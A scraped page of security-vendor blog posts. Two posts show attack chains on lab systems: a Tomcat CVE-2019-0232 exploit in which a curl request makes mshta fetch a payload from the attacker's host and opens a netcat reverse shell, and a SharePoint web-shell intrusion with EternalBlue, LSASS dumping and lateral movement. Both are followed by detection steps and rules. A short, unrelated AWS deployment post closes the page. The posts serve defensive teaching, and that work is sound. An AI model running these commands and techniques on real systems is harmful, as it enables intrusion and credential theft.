Now the attacker decides to create a malicious payload that will spawn a remote shell. To do that, he uses a tool dubbed WeirdHTA that allows to create an obfuscated remote shell in hta format that he can then invoke remotely using the Microsoft mshta utility. The attacker tests the file with the most common anti virus software to ensure is properly obfuscated and not detected before initiating the attack.



The attacker launches the below command to connect to the remote server and run the malicious payload:

root@kali:~# curl -v ""
*   Trying
* Connected to ( port 8080 (#0)
> GET /cgi/app.bat?&C%3A%2FWindows%2FSystem32%2Fmshta.exe+http%3A%2F%2F192.168.16.146%3A8000%2Fshell.hta HTTP/1.1
> Host:
> User-Agent: curl/7.66.0
> Accept: */*
* Mark bundle as not supporting multiuse
< HTTP/1.1 200
< Content-Type: text/plain
< Content-Length: 15
< Date: Fri, 31 Jan 2020 10:44:16 GMT
Hello, World!
* Connection #0 to host left intact


If we break this command down we can see the following:

  1. curl -v "
      The above is the URL of the Tomcat server where the CGI Servlet app (app.bat) resides
  2. ?&C%3A%2FWindows%2FSystem32%2Fmshta.exe+
      The second part is a URL-encoded string that decodes to C:\Windows\System32\mshta.exe
  3. http%3A%2F%2F192.168.16.146%3A8000%2Fshell.hta"
    This last part is the URL-encoded address of the remote location ( where the attacker keeps the malicious payload, that is shell.hta.


The attacker, who had created a listener on his remote server, obtains the shell:

root@kali:~# nc -lvnp 7777
listening on [any] 7777 ...
connect to [] from (UNKNOWN) [] 50057
Client Connected...

PS C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi> dir

    Directory: C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi

Mode                LastWriteTime         Length Name                                                                 
----                -------------         ------ ----                                                                 
d-----       17/12/2019     15:00                %SystemDrive%                                                        
-a----       16/12/2019     21:37             67 app.bat                                                              
-a----       19/12/2019     13:19             21                                                             

PS C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi>


Part 2 - Detection phase with the RSA NetWitness Platform

While investigating with RSA NetWitness Endpoint the analyst notices the Behaviors of Compromise meta key populated with the value runs mshta with http argument, which is unusual.



Filtering by the runs mshta with http argument indicator, the analyst observes that an application running on Tomcat is launching mshta which in turn is calling an hta file residing on a remote server (



Drilling into these sessions using the event analysis panel, the analyst is able to confirm the events in more detail:

  1. app.bat ( running on machine with hostname winEP1 and IP
  2. created the process
  3. called mshta.exe
  4. mshta.exe runs with the parameter


The analyst, knowing the affected machine IP address, decides to dig deeper with the RSA NetWitness Platform using the network (i.e. packet) data.


  1. Investigating around the affected machine IP in the same time range, the analysts notices the IP address (attacker) connecting to Tomcat on port 8080 (to test whether the server is vulnerable to CVE-2019-0232) by adding the dir command to the URL. He can also see the response.

  2. Immediately after the first event, the analyst notices the same IP address connecting on the same port but this time using a more complex GET request which seems to allude to malicious behavior.

  3. Now the analysts filters by ip.dst= (the IP address found in the GET request above) and he is able to see the content of the shell.hta file. Although it is encoded and not human-readable it is extremely suspicious!

  4. Next, the analysts filters by ip.dst= and he eventually sees that the attacker has obtained shell access (through PowerShell) to the windows machine where Tomcat resides.



LotL tactics are very effective and difficult to detect due to the legitimate nature of the tools used to perform such attacks. Constant monitoring and proactive threat hunting are vital for any organization. The RSA NetWitness Platform provides analysts with the visibility needed to detect such activities, thus reducing the risk of being compromised.

In this post we will cover CVE-2019-0604 (, albeit a somehwhat older vulnerability, it is one that is still being exploited. This post will also go a little further than just the initial exploitation of the Sharepoint server, and use EternalBlue to create a user on a remote endpoint to allow lateral movement with PAExec; again, this is an old, well-known vulnerability, but something still being used. We will then utilise Dumpert to dump the memory of LSASS ( and obtain credentials, and then employ atexec from Impacket ( to further laterally move.


The Attack

The initial foothold on the network is obtained is via the Sharepoint vulnerability (CVE-2019-0604). We will use the PoC code developed by Voulnet ( to drop a web shell:


In the above command we are targetting the vulnerable Picker.aspx page, and using cmd to echo a Base64 encoded web shell to a file in C:\ProgramData\ - we then use certutil to Base64 decode the file into a publicly accessible directory on the Sharepoint server and name it, bitreview.aspx.


To access the web shell we just dropped onto the Sharepoint server, we are going to use the administrative tool, AntSword ( Here we add the URL to the web shell we dropped, and supply the associated password:


Now we can open a terminal and begin to execute commands on the server to get a lay of the land and find other endpoints to laterally move to:


The AntSword tool has a nice explorer view which allows us to easily upload additional tools to the server. In this instance we upload a scanner to check if an endpoint is vulnerable to EternalBlue:


Now we can iterate through some of the endpoints we uncovered earlier to see if any of them are vulerable to EternalBlue:


Now that we have uncovered a vulnerable endpoint, we can use this to create a user that will allow us to laterally move to it. Using the PoC code created by Worawit (, we can exploit the endpoint and execute custom shellcode of our choosing. For this I compiled some shellcode to create a local administrative user called, helpdesk. I uploaded my shellcode and EternalBlue exploit executable and ran it against the vulnerable machine:


Now we have created a local administrative user on the endpoint, we can laterally move to it using those credentials. In this instance, we upload PAExec, and Dumpert, so we can laterally move to the endpoint and dump the memory of LSASS. The following command copies the and executes the Outflank-Dumpert.exe using PAExec and the helpdesk user we created via EternalBlue:


This tool will locally dump the memory of LSASS to C:\Windows\Temp - so we will mount one of the administrative shares on the endpoint, and confirm if our dump was successful:


Using AntSwords explorer, we can easily navigate to the file and download it locally:


We can then use Mimikatz on the attackers' local machine to dump the credentials which may help us laterally move to other endpoints:


We decide to upload the atexec tool from Impacket to execute commands on the remote endpoint to see if there are other machines we can laterally move to. Using some reconaissance commands, we find an RDP session using the username we pulled from the LSASS dump:


From here, we could continue to laterally move, dump credentials, and further own the network.


Detection using NetWitness Network

NetWitness doesn't always have to be used for threat hunting, it can also be used to search for things you know about, or have been currently researching. Taking the Sharepoint RCE as an example, we can easily search using NetWitness to see if any exploits have taken place. Given that this is a well documented CVE, we can start our searching by looking for requests to picker.aspx (filename = 'picker.aspx'), which is the vulnerable page - from the below we can see two GET requests, and a POST for Picker.aspx (inbound requests directly to this page are uncommon):

Next we can reconstruct the events to see if there is any useful information we can ascertain. Looking into the HTTP POST, we can see the URI matches what we would expect for this vulnerability, we also see that the POST parameter, ctl00$PlaceHolderDialogBodySection$ctl05$hiddenSpanData, contains the hex encoded and serialized .Net XML payload. The payload parameter also starts with two underscores which will ensure the payload reaches the XML deserialization function as is documented:


Seeing this would already warrant investigation on the Sharepoint server, but lets use some Python so we can take the hex encoded payload and deserialize it to see what was executed:


From this, we have the exact command that was run on the Sharepoint server that dropped a web shell. This also means we now know the name of the web shell and where it is located, making the next steps of investigation easier:

As analysts, it sometimes pays to do these things to find additional breadcrumbs to pull from, although be careful, as this can be time consuming and other methods can make it a lot easier, like MFT analysis that is described later on in the blog post.


This means we could search for this filename in NetWitness to see if we have any hits (filename = 'bitreview.aspx'):


As you can see from the above highlighted indicators, even without knowing the name of the web shell we would have still uncovered it as NetWitness created numerous meta values surrounding its usage. A fairly recent addition to the Lua parsers available on RSA Live is, fingerprint_minidump.lua - this parser creates the meta value, minidump, under the Filetype meta key, and also creates the meta value, lsass minidump, under the Indicators of Compromise meta key. This parser is a fantastic addition as it tags LSASS memory dumps traversing the network, which is uncommon behaviour.


Reconstructing the events, we can see the web shell traffic which looks strikingly similar to China Chopper. The User-Agent is also a great indicator for this traffic, which is the name of the tool used to connect to the web shell:


We can Base64 decode the commands from the HTTP POST's and get an insight into what was being executed. The below shows the initial POST which returns the current path, operating system, and username:


The following shows a directory listing of C:\ProgramData\ being executed, which is where the initial Base64 encoded bitreview.aspx web shell was dropped:


We should continue to Base64 decode all of these commands to gain a better understanding of what the attacker did, but for this blog post I will focus on the important pieces of the traffic. Pivoting into the Events view for the meta value, hex encoded executable, we can see the magic bytes for an executable that have been hex encoded:


Extracting all the hex starting from 4D5A (MZ header in hexadecimal) and decoding it with CyberChef, we can clearly see this is an executable. From here, we could save this file and perform further analysis on it:


Continuing on with Base64 decoding the commands we come across something interesting, it is the usage of a tool called eternalblue_exploit7.exe against an endpoint in the same network. This gives the defender additional information surrounding other endpoints of interest to the attacker and endpoint to focus on:

If you only have packet visibility, you should always decode every command. This will help you as a defender better understand the attackers actions and uncover additional breadcrumbs. But if you have NetWitness Endpoint, it may be easier to see the commands there, as we will see later.


Knowing EternalBlue uses SMB, we can pivot on all SMB traffic from the Sharepoint server to the targetted endpoint. Opening the Enablers of Compromise meta key we can see two meta values indicating the use of SMBv1; this is required for EternalBlue to work. There is also an meta value of not implemented under the Error meta key this is fairly uncommon and can help detect potential EternalBlue exploitation:


Reconstructing the events for the SMBv1 traffic, we come across a session that contains a large sequence of NULLs, this is the beginning of the EternalBlue exploit and these NULLs essentially move the SMB server state to a point where the vulnerability exists:


With most intrusions, there is typically some form of lateral movement that takes place using SMB. As a defender we should iterate through all possible lateral movement techniques, but for this example I want to see if PAExec has been used. To do this I use the following query (service = 139 && filename = 'svcctl' && filename contains 'paexe'). From the below, we can see that there is indeed some PAExec activity. By default, PAExec also includes the hostname of where the activity occured from, so from the below filenames, we can tell that this activity came from SP2016, the Sharepoint server. We can also see that a file was transferred, as is indicated by the paexec_move0.dat meta value - this is the Outflank-Dumpert.exe tool:


Back in the Investigation view, under the Indicators of Compromise meta key, we see a meta value of lsass minidump. Pivoting on this value, we see the dumpert.dmp file in the temp\ directory for the endpoint that was accessed over the ADMIN$ share - this is our LSASS minidump created using the Outflank-Dumpert.exe tool:


Navigating back to view all the SMB traffic, and focusing on named pipes (service = 139 && analysis.service = 'named pipe'), we can see a named pipe being used called atsvc. This named pipe gives access to the AT-Scheduler Service on an endpoint and can be used to scheduled tasks remotely. We can also see some .tmp files being created in the temp\ directory on this endpoint with what look like randomly generated names, and window cli admin commands associated with one of them:


Reconstructing the events for this traffic, we can see the scheduled tasks being created. In the below screenshot, we can see the XML and the associated parameters passed, in this instance using CMD to run netstat looking for RDP connections and output the results to %windir%\Temp\rWLePJvp.tmp:


This is lateral movement behaviour via Impackets tool, atexec. It writes the output of the command to a file so it can read it and display back to the attacker - further analysing the payload, we can see the output that was read from the file and gain insight into what the attacker was after, and subsequently endpoints to investigate:



Detection using NetWitness Endpoint

As always with NetWitness Endpoint, I like to start my hunting by opening the three compromise keys (IOC, BOC, and EOC). In this case, I only had meta values under the Behaviours of Compromise meta key. I have highlighted a few I deem more interesting with regards to this blog, but you should really investigate all of them:


Let's start with the runs certutil with decode arguments meta value. Opening this in the Events view, we can see the parameter that was executed, which is a Base64 encoded value being echo'ed to the C:\ProgramData\ directory, and then certutil being used to decode it and push it to a directory on the server:


From here, we could download the MFT of the endpoint:


Locate the file that was decoded, download it locally, and see what the contents are:


From the contents of the file, we can see that this is a web shell:


We also observed the attacker initially drop a file in the C:\ProgramData\ directory, so this is also a directory of interest and somewhere we should browse to within the MFT - here we uncover the attackers tools which we could download and analyse:


Navigating back to the Investigate view and opening the meta value http daemon runs command prompt in the Events view, we can see the HTTP daemon, w3wp.exe, executing reconaissance commands on the Sharepoint server:

This is a classic indicator for a web shell, whereby we have a HTTP daemon spawning CMD to execute commands.


Further analysis of the commands executed by the attacker shows EternalBlue executables being run against an endpoint, after this, the attacker uses PAExec with a user called helpdesk to connect to the endpoint - implying that the EternalBlue exploit created a user called helpdesk that allowed them to laterally move (NOTE: we will see how the user creation via this exploit looks a little later on):


Navigating back to Investigate, and this time opening the Events view for creates local user account, we see lsass.exe running net.exe to create a user account called, helpdesk; this is the EternalBlue exploit. LSASS should never create a user, this is a high fidelity indicator of malicious activity:


Another common attacker action is to dump credentials. Due to the popularity of Mimikatz, attackers are looking for other methods of dumping credentials, this typically involves creating a memory dump of the LSASS process. We can therefore use the following query (action = 'openosprocess' && filename.dst='lsass.exe'), and open the Filename Source meta key to look for something opening LSASS that stands out as anomalous. Here we can see a suspect executable opening LSASS named, Outflank-Dumpert.exe:


As defenders, we should continue to triage all of the meta values observed. But for this blog post, I feel we have demonstrated NetWitness' ability to detect these threats.


Detection Rules

The following table lists some application rules you can deploy to help with identifying these tools and behaviours:





Packet Decoder

Requests of interest to Picker.aspx

service = 80 && action = ‘post’ && filename = 'picker.aspx' && directory contains '_layout'


Packet Decoder

AntSword tool usage

client begins 'antsword'


Packet Decoder

Possible Impacket atexec usage

service = 139 && analysis.service = 'named pipe' && filename = 'atsvc' && filename ends 'tmp'


Packet Decoder

Dumpert LSASS dump

fiilename = 'dumpert.dmp'


Packet Decoder

Possible EternalBlue exploit

service = 139 && error = 'not implemented' && eoc = 'smb v1 response'


Packet Decoder

PAExec activity

service = 139 && filename = 'svcctl' && filename contains 'paexe'



Endpoint Log Hybrid

Opens OS process LSASS

action = 'openosprocess' && filename.dst='lsass.exe'


Endpoint Log Hybrid

LSASS creates user

filename.src = ‘lsass.exe’ && filename’dst = ‘net.exe’ && param.dst contains’ /add’




Threat actors are consistently evolving and developing new attack methods, but they are also using tried and tested methods as well - there is no need for them to use a new exploit when a well-known one works just fine on an unpatched system. Defenders should not only be keeping up to date with the new, but also retroactively searching their data sets for the old.

Hi everyone!  In this video blog, I provide a demo of getting an 11.4 RSA NetWitness Platform full stack deployment within AWS. The demo deployment includes the following hosts:

  • NW Server
  • Network Hybrid
  • Health & Wellness Beta
  • Analyst UI


Please like or comment to let me know if this vblog was useful.



RSA NetWitness Platform - Product Manager

Filter Blog

By date: By tag: